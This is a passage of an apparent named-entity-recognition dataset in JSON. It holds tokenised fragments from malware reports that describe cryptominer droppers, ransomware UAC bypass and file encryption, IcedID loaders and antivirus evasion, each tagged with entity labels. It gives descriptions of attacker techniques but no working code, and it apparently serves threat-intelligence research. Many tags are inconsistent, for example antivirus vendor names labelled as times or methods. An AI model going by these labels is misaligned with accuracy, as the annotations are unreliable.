"disk." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "B-SamFile", "I-SamFile", "O", "O", "O" ] }, { "tokens": [ "Even", "though", "the", "scripts", "produce", "many", "on-disk", "artifacts,", "the", "dropper", "and", "scripts", "are", "quick", "to", "remove", "them" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Files", "are", "deleted", "after", "use." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "proxy", "the", "miner’s", "network", "communications." ], "ner_tags": [ "O", "O", "O", "B-Idus", "O", "O" ] }, { "tokens": [ "mining", "proxy." ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "The", "usage", "of", "a", "proxy", "allows", "authors", "to", "control", "all", "of", "their", "mining", "implants", "and", "their", "target", "pools", "via", "a", "centralized", "console" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "mining", "proxy" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "command", "line", "arguments" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "is", "executed", "as", "a", "command", "line", "argument" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "padded", "i2pd", "Mach-O", "file" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "pads", "the", "resulting", "Mach-O", "with", "a", "random", "number", "of", "\\x00", "bytes" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "binaries", "are", "padded", "with", "a", "random", "number", "of", "zero", "bytes", "to", "change", "its", "hash", "and", "expand", "its", "size." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "padded", "with", "a", "random", "number", "of", "\\x00", "bytes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "user", "will", "continue", "to", "execute", "the", "dropper" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "The", "dropper", "is", "executed", "by", "the", "user." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "As", "long", "as", "the", "dropper", "successfully", "launches", "its", "legitimate", "application" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "dropper", "bundle", "in", "the", "applications", "folder", "appears", "legitimate," ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "authors", "cleverly", "utilized", "these", "legitimate", "dependencies", "via", "symbolic", "links", "when", "dynamically", "creating", "the", "legitimate", "bundle", "in", "the", "temp", "folder." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "dropper", "is", "installed", "into", "a", "legitimate", "file", "path,", "posing", "as", "the", "legitimate", "application." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "utilize", "legitimate", "file", "paths", "to", "mask", "their", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "order", "to", "appear", "as", "a", "working", "copy", "of", "Logic", "Pro", "X,", "the", "dropper", "contains", "a", "legitimate", "copy", "of", "the", "lure", "application" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "mirrored", "bundle", "contains", "the", "legitimate", "application", "instead", "of", "the", "dropper", "binary." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "mirror", "all", "directories", "found", "in", "/Applications/Logic", "Pro", "X.app/Contents", "and", "/Applications/Logic", "Pro", "X.app/Contents/MacOS", "to", "their", "respective", "/tmp/", "locations" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malicious", "dropper", "contains", "a", "legitimate", "version", "of", "the", "software", "and", "executes", "it", "to", "give", "the", "illusion", "of", "a", "properly", "behaving", "application." ], "ner_tags": [ "O", "B-Way", "B-Tool", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "check", "using", "pgrep", "for", "Activity", "Monitor", "processes" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "This", "proxy", "server", "is", "located", "on", "the", "I2P", "network", "at", "the", "destination", "of", "the", "pool", "tunnel" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "config", "via", "the", "XMRig", "miner’s", "native", "API." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "By", "modifying", "the", "below", "registry", "value", "EnableLUA", "to", "“0”" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "The", "ConsentPromptBehaviorAdmin", "key", "has", "been", "set", "to", "“0”,", "indicating", "that", "the", "behavior", "of", "the", "consent", "prompt", "for", "actions", "requiring", "administrator", "privileges", "has", "been", "modified" ], "ner_tags": [ "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "ransomware", "modifies", "specific", "registry", "values" ], "ner_tags": [ "O", "B-Way", "B-Features", "O", "O", "O" ] }, { "tokens": [ "malware", "aims", "to", "deactivate", "User", "Account", "Control", "(UAC)", "on", "the", "target", "system" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "UAC", "BYPASS" ], "ner_tags": [ "B-Idus", "B-HackOrg" ] }, { "tokens": [ "to", "disable", "User", "Access", "Control", "(UAC),", "a", "security", "feature", "in", "Windows" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "By", "deactivating", "UAC,", "the", "ransomware", "gets", "elevated", "privileges", "without", "requiring", "user", "permission", "or", "administrator", "credentials" ], "ner_tags": [ "O", "B-Way", "B-Way", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "bypassing", "UAC" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "ransomware", "uses", "the", "FindFirstVolumeW()", "and", "FindNextVolumeW()", "API", "functions" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "using", "the", "FindFirstFileW()", "and", "FindNextFileW()", "API", "functions." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "the", "malware", "leverages", "various", "functions", "from", "the", "CryptoAPI,", "including", "CryptAcquireContextW(),", "CryptImportKey(),", "CryptSetKeyParam(),", "and", "CryptEncrypt()." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "using", "the", "MoveFileExW()", "API", "function," ], "ner_tags": [ "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "to", "search", "and", "identify", "accessible", "volumes", "on", "the", "targeted", "system." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "proceeds", "to", "identify", "files", "and", "directories", "for", "encryption", "by", "iterating", "through", "them" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "function", "scans", "a", "specified", "path", "by", "finding", "all", "files", "within", "the", "given", "directory", "and", "its", "subdirectories." ], "ner_tags": [ "O", "O", "B-Features", "I-Features", "I-Features", "I-Features", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "then", "iterates", "over", "each", "volume", "to", "search", "for", "specific", "files", "related", "to", "virtual", "machines." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "function", "scans", "VM", "volumes", "on", "an", "ESXi", "server." ], "ner_tags": [ "O", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "scanning", "files", "in", "a", "specified", "or", "generic", "path" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "then", "iterates", "over", "each", "volume", "to", "find", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "command", "uses", "the", "Windows", "Management", "Instrumentation", "Command-line", "(WMIC)" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "This", "function", "is", "responsible", "for", "deleting", "all", "files", "and", "directories", "in", "the", "user’s", "trash", "folder." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "by", "passing", "the", "file", "path", "to", "be", "encrypted", "as", "an", "argument." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "removes", "log", "files", "and", "temporary", "files", "from", "the", "root", "directory." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "also", "deletes", "the", "ransomware,", "script", "file,", "and", "ransom", "note", "(index.html),", "ensuring", "that", "no", "evidence", "remains", "on", "the", "compromised", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "B-Way", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "uses", "the", "esxcli", "command", "to", "list", "all", "VM", "processes" ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "configuring", "autorun", "entries," ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "through", "legitimate", "remote", "access", "software", "such", "as", "AnyDesk" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "invoked", "the", "wave", "2", "ransomware", "immediately", "from", "the", "command", "line" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "both", "use", "CreateFile", "and", "WriteFile", "APIs" ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "using", "DeviceControl", "API", "methods" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "use", "of", "the", "same", "DeviceControl", "API", "methods" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DeviceControl", "API", "methods" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "DeviceControl", "API", "methods" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "ransomware", "attempts", "to", "decrypt" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "RC4", "key", "for", "decryption" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "RC4", "decryption", "method", "uses", "CryptoAPI", "(CryptDecrypt)", "instead", "of", "the", "usual", "substitution", "box", "method" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "execute", "embedded", "scripts" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Embedding", "of", "EldoS", "RawDisk", "driver", "inside", "the", "wiper", "malware" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "embedded", "the", "signed", "raw", "disk", "driver", "in", "the", "wiper", "executable" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "raw", "disk", "driver", "was", "embedded", "inside", "the", "malware" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "download", "and", "launch", "of", "a", "suspicious", "batch", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "actor", "introduced", "a", "downloader", "to", "fetch", "and", "spawn", "the", "next", "stage", "payload" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malicious", "document", "connects", "to", "the", "remote", "server", "and", "downloads", "the", "payload" ], "ner_tags": [ "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "install", "additional", "malware" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "They", "then", "returned", "18", "hours", "later", "to", "install", "further", "malware" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "when", "the", "malicious", "Word", "document", "opens", "it", "fetches", "the", "next", "payload", "from", "the", "remote", "server:" ], "ner_tags": [ "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "fetched", "an", "additional", "script", "payload" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "different", "method", "of", "fetching", "and", "executing", "the", "next", "stage", "payload" ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "file", "downloaded", "from", "the", "internet," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "fetch", "the", "next", "stage", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "If", "the", "fetched", "data", "by", "cURL", "command" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fetch", "the", "payload", "with", "cURL", "command" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "fetching", "the", "next", "stage", "payload" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "fetching", "a", "remote", "payload" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "fetches", "a", "payload", "from", "the", "embedded", "URL", "and", "loads", "it." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "launch", "of", "a", "suspicious", "batch", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windows", "Batch", "script" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "operator", "executed", "several", "Windows", "commands" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cmd.exe", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "batch", "file" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "The", "batch", "file", "name" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "scriptlet", "of", "the", "batch", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cmd.exe\"", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd.exe\"", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Windows", "Batch", "file" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "This", "script", "is", "for", "executing", "the", "PowerShell", "script", "via", "a", "Windows", "scheduled", "task" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windows", "displays", "a", "warning", "message", "when", "the", "user", "tries", "to", "open", "a", "file", "downloaded", "from", "the", "internet." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "strategy", "to", "persuade", "the", "victim", "to", "execute", "the", "malicious", "shortcut", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "executed", "when", "the", "victim", "double-clicked", "on", "the", "shortcut", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "executable", "ieinstal.exe", "was", "used", "to", "bypass", "UAC." ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "one", "victim", "in", "the", "UAE", "was", "attacked", "using", "a", "malicious", "Word", "document" ], "ner_tags": [ "O", "O", "O", "O", "B-Area", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile" ] }, { "tokens": [ "to", "gather", "basic", "system", "information." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "rundll32.exe" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "spawns", "it", "with", "the", "rundll32.exe", "command", "with", "the", "payload", "URL" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Embedded", "files", "of", "ISO", "image" ], "ner_tags": [ "B-Features", "B-Features", "O", "O", "O" ] }, { "tokens": [ "an", "encrypted", "Dump.bin", "file" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "downloader", "contains", "an", "encrypted", "configuration", "at", "the", "end", "of", "the", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "supplied", "encrypted", "decoy", "document." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "an", "encrypted", "decoy", "document" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "PDF", "and", "executable", "files", "have", "numerous", "spaces", "before", "the", "file", "extension", "to", "hide", "it", "and", "allay", "suspicions." ], "ner_tags": [ "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decodes", "0x3E8", "bytes", "with", "that", "key" ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "The", "decrypted", "data" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "loads", "the", "decrypted", "DLL", "file" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "decrypts", "the", "configuration", "data", "with", "the", "RC4", "algorithm", "using", "an", "embedded", "64-byte", "key." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "decrypts", "the", "payload", "with", "a", "delivered", "64-byte", "RC4", "key." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "decrypted", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "checks", "for", "the", "names", "of", "the", "following", "antivirus", "vendors:", "Sophos,", "Kaspersky,", "Avast,", "Avira,", "Bitdefender,", "TrendMicro,", "and", "Windows", "Defender" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Time", "B-Idus", "B-Idus", "B-Idus", "B-Org", "O", "O", "B-SecTeam" ] }, { "tokens": [ "If", "TrendMicro,", "BitDefender,", "or", "Windows", "Defender", "products", "are", "installed" ], "ner_tags": [ "O", "B-Way", "B-Way", "O", "O", "B-SecTeam", "B-Tool", "O", "O" ] }, { "tokens": [ "If", "Windows", "Defender", "or", "Bitdefender", "Antivirus", "is", "installed", "on", "the", "victim’s", "computer" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "depending", "on", "the", "antivirus", "installed." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "can", "disable", "the", "functionalities", "of", "EDR/AV", "products." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "injects", "the", "fetched", "payload", "into", "the", "explorer.exe", "process" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "The", "Blockchain.pdf", "file", "is", "a", "malicious", "HTML", "application", "file" ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "O", "O", "O", "B-Way", "I-Tool", "I-Tool" ] }, { "tokens": [ "This", "evasion", "technique", "overwrites", "the", ".text", "section", "of", "the", "pre-loaded", "ntdll", "library", "with", "the", "freshly", "loaded", "one", "so", "that", "the", "hooked", "API", "addresses", "are", "recovered", "with", "the", "original", "API", "address" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "campaigns", "used", "a", "variety", "of", "email", "attachments", "such", "as", "Microsoft", "OneNote", "attachments", "and", "somewhat", "rare", "to", "see", ".URL", "attachments," ], "ner_tags": [ "O", "B-OffAct", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "I-SamFile", "B-SecTeam", "B-SecTeam", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam" ] }, { "tokens": [ "This", "campaign", "began", "with", "thread", "hijacked", "emails", "which", "contained", "HTML", "attachments." ], "ner_tags": [ "O", "B-OffAct", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "The", "HTML", "attachments", "used", "HTML", "Smuggling", "to", "drop", "a", "password", "protected,", "zipped", "Windows", "Script", "File", "(WSF)." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "download", "and", "execute", "an", "intermediate", "script", "which", "then", "downloaded", "and", "executed", "the", "Standard", "IcedID", "Loader", "using", "a", "non-standard", "export", "“init”." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "to", "download", "and", "execute", "an", "IcedID", "loader." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "opened", "it", "would", "initiate", "the", "download", "of", "a", "batch", "(.bat)", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "The", "batch", "file", "would", "download", "and", "execute" ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "When", "opened,", "the", "OneNote", "document", "instructed", "the", "recipient", "to", "\"open\"", "the", "document", "by", "double-clicking", "the", "button", "displayed", "in", "the", "OneNote", "document." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "file", "was", "concealed", "beneath", "the", "\"open\"", "text", "which,", "if", "clicked,", "executed", "the", "HTA", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "containing", "the", "encrypted", "bot", "and", "DLL", "loader." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "download", "of", "a", "batch", "(.bat)", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "batch", "file", "would", "download", "and", "execute" ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "that", "contained", "various", "bat", "files," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "execute", "an", "IcedID", "loader", "with", "rundll32" ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "loader", "with", "rundll32" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Config", "decryption", "within", "IcedID", "Lite", "Loader." ], "ner_tags": [ "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "Decryption", "of", "the", "URI", "within" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "domain", "is", "decrypted", "from", "the", "configuration", "and", "the", "URI", "path", "is", "decrypted", "within", "the", "function" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decryption", "is", "the", "same", "across", "both" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "pattern", "of", "decrypting", "strings" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "Forked", "Loader", "decrypts", "and", "copies", "strings", "into", "global", "variables", "where", "they", "will", "be", "later", "used", "to", "resolve", "required", "functions." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Decryption", "of", "the", "config", "buffer", "in", "the", "Forked", "Loader." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "With", "the", "config", "decrypted" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "response", "gets", "decrypted", "with", "the", "IcedID", "decryption", "routine," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "Contains", "code", "to", "decrypt", "strings", "and", "domains" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "String", "decryption", "of", "the", "DLL", "names" ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O" ] }, { "tokens": [ "With", "the", "DLL", "strings", "decrypted,", "the", "malware", "then", "decrypts", "the", "loader", "configuration", "by", "taking", "the", "first", "64", "bytes", "and", "XORing", "it", "against", "the", "next", "64", "bytes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "first", "four", "bytes", "of", "the", "decrypted", "buffer", "will", "contain", "the", "project", "identifier" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "This", "function", "decrypts", "strings" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decrypts", "the", "DLL", "strings", "to", "be", "used", "later", "to", "resolve", "handles", "to", "the", "DLLs", "needed" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "strings", "are", "decrypted", "in", "the", "same", "algorithm", "where", "the", "data", "is", "split", "into", "DWORDs", "and", "XOR’d", "against", "a", "random", "key." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "String", "decryption", "for", "the", "DLL", "names", "needed", "for", "execution." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decryption", "of", "“Lite", "Loader”\"", "domains." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "function", "is", "called", "that", "decrypts", "strings", "that" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "there", "are", "two", "domains", "that", "are", "decrypted:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "With", "the", "domain", "names", "decrypted,", "the", "DLL", "Loader", "decrypts", "10", "strings", "that", "should", "be", "URIs", "to", "be", "appended", "to", "the", "domains." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decryption", "of", "“Lite", "Loader”", "filenames." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "the", "strings", "are", "decrypted" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Base64", "decoding", "this", "value" ], "ner_tags": [ 